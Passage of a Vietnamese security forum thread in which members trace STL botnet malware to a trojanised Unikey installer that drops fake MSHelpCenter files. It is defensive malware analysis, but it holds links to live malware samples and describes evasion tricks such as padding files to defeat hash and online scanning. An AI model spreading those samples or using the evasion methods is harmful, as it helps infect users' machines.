mv1098 wrote:
@bolzano_1989 : gui bro mau virus nay

http://www.mediafire.com/?xyqk2z1jnp1zcd9

Con này mạo danh Avira GmbH

Bác xử lý giùm nhé


Bạn nên gọi đến số 1900571244 để được tư vấn và hỗ trợ bởi CMC InfoSec nếu gặp bất cứ vấn đề gì với CMCIS, đặc biệt là bạn không nên cài virus vô máy tính làm việc của bạn để thử nghiệm virus, đặc biệt là virus của STL.

Bạn có thể tìm dùng tool diệt Sality của CMC:
http://support.cmclab.net/vn/tpmod/?dl
Phiên bản public mới nhất hiện tại:
http://support.cmclab.net/vn/tpmod/?dl=item44

Nếu có vấn đề gì nữa, bạn trao đổi với mình qua tin nhắn riêng để tránh làm loãng chủ đề này nhé.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 16:28:46 (+0700) | #158 | 244212
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
TQN wrote:

PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.


Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN?

Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không?

Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra?
Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 16:46:11 (+0700) | #159 | 244213
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@PXMMRF: Vậy phiền anh gửi cho e qua email theo profile trên HVA (cafe...@yahoo.com). Em sẽ cài đặt và kiểm tra
@TQN: Em hiểu em hiểu, hehe, có điều ko biết lúc e xài được các công cụ trên thì bọn STL này có còn hay không.

P/S: Em là dân webmaster, hic, kiểu này xem ra em hơi mạo hiểm, vì nhiều thông tin (chủ yếu là email và server) của e chắc đã bị lộ. Nhưng không sao, của mình thì không ai dễ dàng lấy được. Em sẽ cố gắng sử dụng hết các tool để tổng hợp các thông tin cần thiết.

Sau loạt bài về STL, muốn học RCE quá đi mất, nhưng tiếc là hiểu biết về ASM của em = zero.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 16:54:59 (+0700) | #160 | 244214
[Avatar]
elt0m
Member
[Minus] 0 [Plus]
Joined: 24/07/2011 22:41:39
Bài gởi: 23
Offline
[Profile] [PM]
PXMMRF wrote:
TQN wrote:

Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra?
Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!


Mình kiểm tra máy mình Xp Sp3 cũng không có

PS: cái link này có thông tin gì chăng?

http://xml.ssdsandbox.net/view/9cefbb3d8dbee992f914aeecd7bff063

Mình thấy Submission Details date là 5/14/2011 11:24:01 PM





[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 16:56:47 (+0700) | #161 | 244215
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Và chúc mừng các anh, cuối cùng em cũng search ra được 2 file: MsHelpCenter.idx và MsHelpCenter.exe (trời ơi smilie()





Mà em phát hiện ra 2 file này, em vui dã man.
Theo suy đoán của em, thì nguồn virus là đây: http://nethoabinh.com/showthread.php?t=315
Và rất rất nhiều các phần mềm khác trên trang này TOP google.
Hi vọng là em không làm mọi người đi sai hướng, cách đây khoảng vào lúc 1h AM ngày hôm nay, em đã tìm kiếm thử 2 file này nhưng hoàn toàn không có, vậy tại sao bây giờ lại có ???. Mà em có làm gì đâu chứ.

Lạ 1 điều là file unikey em setup vào máy (nếu như dự đoán là trước đây e chưa từng dính) ngày 24, thì các file này thấy ngày tạo ra lại là ngày 23, mà ngày 23 em nhậu tơi bời có biết gì đâu, mỗi pà chị em dùng máy smilie. Mà việc chỉnh sửa ngày tháng tạo ra file đối với mấy anh STL là quá quá dễ, em cũng làm được nữa (bằng AutoIT hehe).

Hay là em đã vô tình nói cho các anh STL kích hoạt nó lên. Và giờ các thông tin của em tiêu tùng hết, mấy anh STL ơi em là dân đen, đừng đụng đến công việc của em dùm smilie(.

Post sau e sẽ gửi cả đống file này lên.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 17:01:23 (+0700) | #162 | 244216
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Đây đống file đây, em public ở đây luôn được chứ mọi người ?
http://www.mediafire.com/?k2g07c5792j7cbk
Máy em có cài KIS 2012, mọi người xem thử đây có phải là virus ko.

Nếu có ai muốn teamviewer vào máy em kiểm tra, rất sẵn lòng luôn.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 17:10:20 (+0700) | #163 | 244219
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Em nghĩ đây đích thực là đống virus rồi, vì _desktop.ini gì mà đến 2,236 KB luôn. MS chắc hông tạo ra mấy file quỷ này, mà đọc file _desktop.ini thấy có dòng "!This program cannot be run in DOS mode". Thì ... bùn.

Mấy anh xúc tiến nhanh nào, em ko muốn sống chung với virus quá lâu đâu :-<
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 17:59:36 (+0700) | #164 | 244220
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Mọi người đâu mất tiêu hết rồi smilie
Bây giờ thì MsHelpCenter.exe đã nằm trong list process của em, và có thêm 1 vài mẫu (thôi thì nhầm còn hơn bỏ sót)

Report: http://www.virustotal.com/file-scan/report.html?id=27bb621157b8f697db8db29b7c33e19210f817aeba22f15f1f2cc521d9393a7c-1311680402

File: http://www.mediafire.com/?ryrpp5zn13fja90
Scan Autorun: http://www.mediafire.com/?3l9jdtb3xdm5rxy
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 19:34:57 (+0700) | #165 | 244223
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Khônng sao đâu lequi, anh vẫn theo sát máy em mà.
Kệ cha tụi nó, châm một chút cũng không sao. Tui nó cũng update không kịp đâu.
Bây giờ anh chỉ còn mở có một mắt, sáng mai tính tiếp. Yên tâm nhé em ! MsHelpCenter. exe thì cũ rồi. Tưởng thằng nào mới !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 19:37:19 (+0700) | #166 | 244224
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
PXMMRF wrote:
TQN wrote:

PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.


Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN?

Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không?

Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra?
Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!


Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử.

Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói.
http://www.mediafire.com/?fee5d3428euao0k

Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.

PS: Mình có nhớ ở đâu nói rằng (hình như trong diễn đàn này): Nếu bạn là người Việt Nam, sau khi cài xong Windows thì bạn sẽ làm gì? Tất nhiên là làm sao để máy mình có thể xài được tiếng Việt. Vậy thì việc tiếp theo bạn sẽ làm gì? Lên google search, download Unikey, Vietkey... Bọn STL này phải nói là thâm độc thiệt. Chúng nó cài malware lên PC của người Việt, rồi tiếp tay cho kẻ khác làm bậy. Làm sao ngẩng mặt nhìn mọi người đây.



No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 19:39:50 (+0700) | #167 | 244225
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vậy thì biết làm gì bây giờ em, asaxin. Chỉ biết chửi tụi nó chứ làm sao bây giờ !
Nhưng không sao, còn nhiều anh em cao thủ RCE đang vạch mặt chúng. Em yên tâm !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 19:42:25 (+0700) | #168 | 244228
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Tạm thời em nên làm gì để STL ko lấy được các thông tin từ máy em đây nhỉ ? Vì máy em có một số thông tin quan trọng smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 19:47:10 (+0700) | #169 | 244229
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix.
Đúng không mấy anh stl, sự thật mất lòng nhé. Mấy anh tức không ? Làm gì được em ?
À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà !
Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha !
Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 20:23:08 (+0700) | #170 | 244233
[Avatar]
rookey
Member
[Minus] 0 [Plus]
Joined: 01/06/2010 09:04:24
Bài gởi: 22
Đến từ: hồ chí minh
Offline
[Profile] [PM] [Yahoo!]
Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không?

Cái file MSHelpCenter.exe không có trong máy , e kiểm tra 3 máy: 2 win 7, 1 winxp sp3 mà chẳng thấy.
Những ai bị nhiễm mới có thì phải .
Thích nghi không có nghĩa là cơ hội,không có nghĩa là chống lại,mà là tìm cách vượt qua nó!
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 21:04:06 (+0700) | #171 | 244240
exception
Member
[Minus] 0 [Plus]
Joined: 10/07/2011 23:48:25
Bài gởi: 15
Offline
[Profile] [PM]
lulz, STL = Sex Thuỳ Linh, Sống Tào Lao.

Coding như n00b thế này thì anh thất vọng với các chú quá.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 21:25:56 (+0700) | #172 | 244241
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
TQN wrote:
slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix.
Đúng không mấy anh stl, sự thật mất lòng nhé. Tối nay em sương sương vài ba chai rồi, ngứa mồm lên chữi mấy anh chơi. Mấy anh tức không ? Làm gì được em ?
À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà !
Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha !
Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm. Mấy anh nên biết là tới bây giờ, em chỉ dùng 40% công lực của em để dò theo mấy anh thôi. Chỉ cần em ngồi lỳ máy 2 tháng trời, bất chấp tất cả, em sẽ mò tới tận ổ mấy anh !
Đố mấy anh: nhiều vụ em đã hack, đã quậy tới giờ, FBI vẫn tìm không ra ! Đố mấy anh là những vụ gì ? Anonymous, Lucifer là trò trẻ con với em !


Nếu có nhà tài trợ nào đó cho anh TQN 2 tháng lương để cơm gạo áo tiền thì hay biết mấy nhĩ.
Anh RE có nửa mùa hay không, có anh em Cviet, hva... này biết. Ở Việt Nam này cao thủ nhiều hay ko, giỏi đến mức nào thì tôi không biết. Nhưng với tôi, hiện nay anh đang là số 1 của làng CNTT VN
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 21:45:26 (+0700) | #173 | 244242
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
asaxin wrote:

Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử.

Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói.
http://www.mediafire.com/?fee5d3428euao0k

Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.


Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 22:15:22 (+0700) | #174 | 244244
mapthulu
Member
[Minus] 0 [Plus]
Joined: 10/06/2011 12:16:42
Bài gởi: 28
Offline
[Profile] [PM]
Bài trả lời của mình sẽ không ăn nhập gì đến những bài trên, nhưng vì sao thấy nó có nét giống giống nên mình đưa lên xem có được gì hay không.
Hôm nay server mình bị tấn công, nên mình lọc được vài thông tin
Code:
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.css HTTP/1.1" 200 20399 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /clientscript/vbulletin-core.js?v=408 HTTP/1.1" 200 47757 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.min.js HTTP/1.1" 200 54296 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET / HTTP/1.1" 302 0 "http://abcdef-site.com/" "-"

Không có user-agent, abcd... là domain mình đã ẩn
http://cC2.upanh.com/25.587.32753521.OoE0/1.png

http://cC5.upanh.com/25.587.32753524.bi30/2.png

http://www.stopforumspam.com/ipcheck/115.78.4.183
http://cC7.upanh.com/25.587.32753526.mkB0/3.png

Kiểm thử nguyenvietcam77 thì cũng ra nethoabinh
http://cC1.upanh.com/25.587.32753540.4vt0/5.png

Kiểm thử vài cái nữa thì ra user khác, vậy là IP động rồi
http://cC1.upanh.com/25.587.32753530.F8s0/4.png

sửa wrote:
Chỉnh lại cho đỡ kéo màn hình khi mọi người xem
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 22:29:18 (+0700) | #175 | 244245
[Avatar]
crc32
Member
[Minus] 0 [Plus]
Joined: 03/10/2008 21:56:29
Bài gởi: 31
Offline
[Profile] [PM]
TQN wrote:
...

Bây giờ cứ để đó, lên mạng down SysInternals Suite, CurrPort, SmartSniff. Đọc help và tập dùng.
Chỉ cần nhiêu đó là đủ tìm ra "mèo què" rồi, không cần đao to búa lớn đâu.
Bất kỳ tool nào, mình hiểu nó 1 thì nó mang lại cho mình 1, hiểu 10 thì mang lại 10.
Tập trung vào Process Explorer và ProcMon, AutoRuns, TCPView. Đọc help cho kỹ.
Trong Process Explorer, check menu "Verify Image Signatures" trong Options menu.
Duyệt từng process trên upper panel, right click - Properties, click tab TCP/IP. Nếu thấy có connect tới link đó thì xem process đó có verify không (trong tab Image). Nếu không có verify => à à, mày là "mèo què". Còn có, verify từng Dll của process đó, cũng right click - Properties, Verify. Thằng nào không có verified thì up lên. Up lầm còn hơn bỏ sót.
...


Nhờ anh TQN mà em vừa tìm được nguyên nhân vì sao khung search biến mất bấy lâu nay trên máy khi nhấn nút search chỉ còn chú cún ngồi quẩy đuôi đó là Worm/Win32.Polip.gen.

Con này núp trong file driver em tải trên site của Nvidia do Antiy-AVL phát hiện, kill ẻm một phát, nhấn nút search, khung search xuất hiện liền.



[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 06:37:18 (+0700) | #176 | 244253
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL.
Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB).
Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích.
accouris89, exception và các anh em khác phân tích tụi này nhé !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 07:20:37 (+0700) | #177 | 244255
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Cái file Unikey mà bác asaxin em thấy bkav em đang dùng nó diệt rồi smilie) hài quá . Bkav mà cũng đã chém được rồi cơ đất smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 07:52:11 (+0700) | #178 | 244259
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
TQN wrote:
File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL.
Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB).
Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích.
accouris89, exception và các anh em khác phân tích tụi này nhé !


File MSHelpCenter.* của lequy là giống với mẫu mà asaxin up. File size khác nhau là vì phần "rác" chèn thêm vào được sinh ngẫu nhiên, còn thực ra file gốc chỉ có :

Code:
07/26/2011 11:04 PM 167,936 MsHelpCenter.exe
07/26/2011 11:04 PM 65,536 MsHelpCenter.idx
07/26/2011 11:04 PM 62,976 thumbcache.db
07/26/2011 11:04 PM 36,864 _desktop.ini
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 08:18:46 (+0700) | #179 | 244260
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:
asaxin wrote:

Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử.

Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói.
http://www.mediafire.com/?fee5d3428euao0k

Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.


Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi smilie


Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì)
Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:

Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra


Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.

Note.
-Cái STL Master website-server mà tôi check từ thông tin của axasin chính là cái có quy mô khá hoành tráng, như tôi nói ở trên.
- Tôi bắt đầu "hy sinh' 2 máy cài Win7 và Win XP cho nhiễm STL virus vào xem nó thế nào. Hơi mất công và thời gian đây.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 08:41:33 (+0700) | #180 | 244264
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
PXMMRF wrote:


Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì)
Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:

Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra


Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.



Có 2 nơi mà file fake unikey sẽ drop MSHelpCenter.* và các thư viện đi kèm đó là : hoặc %windir% hoặc %temp% tuỳ vào việc nó gọi OpenSCManager có thành công hay không.

TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Dựa trên file Fake_Unikey của asaxin, à, "giờ em đã hiểu tại sao" lại có mấy cái Bmp bự bà cố, toàn data rác trong cái đống mshelpcenter.*, thumbcache.db, _desktop.ini.

Ặc ặc, ngồi chưa nóng đxx thì sếp rép, phải chạy đi lên chợ Dân Sinh mua đồ rồi !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 09:05:52 (+0700) | #182 | 244266
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Bộ MSHelpCenter mới và cũ không khác nhau:
Kịch bản thế này:
- Fake Unikey dump ra bộ "mèo" MSHelpCenter, với size nhỏ.
- Fake Unikey vỗ béo đám "mèo" này cho béo hơn, size lớn hơn ( tăng lên tới 9MB ). Việc này không khó vì chỉ cần nới rộng kích thước resource rồi ghi 0 vào. Đám mèo này béo nên khó up lên các trang quét virus trực tuyến. Mỗi lần chạy size này lại khác nhau, nếu lấy chữ ký của file không cẩn thận hoặc chỉ diệt theo MD5 thì chưa chắc đã quét được hết đám "mèo".
- Fake Unikey sửa lại file Unikey.exe ban đầu, thành file exe thật. xoá sạch dấu vết.

@TQN: hôm trước em bảo mà , bọn này code thì ít mà toàn sh!t bên trong
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 09:08:12 (+0700) | #183 | 244267
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.



Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN.

Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:22:44 (+0700) | #184 | 244272
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Em dùng Process Explorer để verify MSHelpCenter,exe nhưng không được




Đây là 4 file trong thư mục Microsoft Help
http://www.mediafire.com/?m5hljr2c17q5ueh

Còn đây la file pcap em save lại từ wireshark ( em cho wireshark capture trước rồi chạy file UniKey, để nó chạy khoảng hơn 5 phút rồi save lại )
http://www.mediafire.com/?f0t4rhkavn5nmyf
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:34:02 (+0700) | #185 | 244275
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Lưu ý: Thư mục "Microsoft Help" không có trong Windows XP, nó sinh ra khi em chạy file Face_UniKey
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 10:38:02 (+0700) | #186 | 244276
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cảm ơn mv1098. Vì nó mạo danh file của MS nên làm gì verify được signature.
Em cứ xoá hết thư mục đó đi. Vào Registry, seach "MsHelpCenter.exe" rồi delete các key, data liên quan.

2 lequy: Toàn bộ file trong BackupUtility cũng là virus, cậu nên kill process BackupSvc, xoá hết các file đó đi, vào Registry search và clean luôn.
Hai file exe: BackupScv.exe và DbCompact.exe chỉ làm nhiệm vụ đơn giản, load, tự xoá. Còn toàn bộ code của virus nằm trong file DbEntry1.idx. Dll giả đuôi .idx

Cũng là trò mạo danh file của MS.

